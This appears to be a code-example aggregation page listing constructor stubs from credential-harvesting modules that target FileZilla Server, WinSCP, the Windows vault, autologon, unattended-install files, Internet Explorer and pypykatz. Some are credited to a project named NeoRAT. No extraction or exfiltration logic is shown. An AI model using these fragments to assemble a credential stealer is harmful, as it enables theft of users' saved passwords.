예제 #1
0
 def __init__(self):
     ModuleInfo.__init__(self, 'filezillaserver', 'sysadmin')
예제 #2
0
 def __init__(self):
     ModuleInfo.__init__(self, 'winscp', 'sysadmin', registry_used=True)
     self.hash = ''
예제 #3
0
 def __init__(self):
     ModuleInfo.__init__(self, 'pypykatz', 'windows', system_module=True)
예제 #4
0
 def __init__(self):
     ModuleInfo.__init__(self, 'vault', 'windows',  only_from_current_user=True)
예제 #5
0
파일: ie.py 프로젝트: viencokhi/NeoRAT
 def __init__(self):
     ModuleInfo.__init__(self, 'ie', 'browsers', registry_used=True, winapi_used=True)
예제 #6
0
 def __init__(self):
     ModuleInfo.__init__(self, 'kalypsomedia', 'games')
예제 #7
0
 def __init__(self):
     ModuleInfo.__init__(self, name='squirrel', category='databases')
예제 #8
0
 def __init__(self):
     ModuleInfo.__init__(self,
                         'autologon',
                         'windows',
                         registry_used=True,
                         system_module=True)
예제 #9
0
 def __init__(self):
     ModuleInfo.__init__(self, 'opensshforwindows', 'sysadmin')
예제 #10
0
 def __init__(self):
     ModuleInfo.__init__(self, 'unattended', 'sysadmin', system_module=True)
예제 #11
0
파일: wsl.py 프로젝트: viencokhi/NeoRAT
 def __init__(self):
     ModuleInfo.__init__(self, 'wsl', 'sysadmin')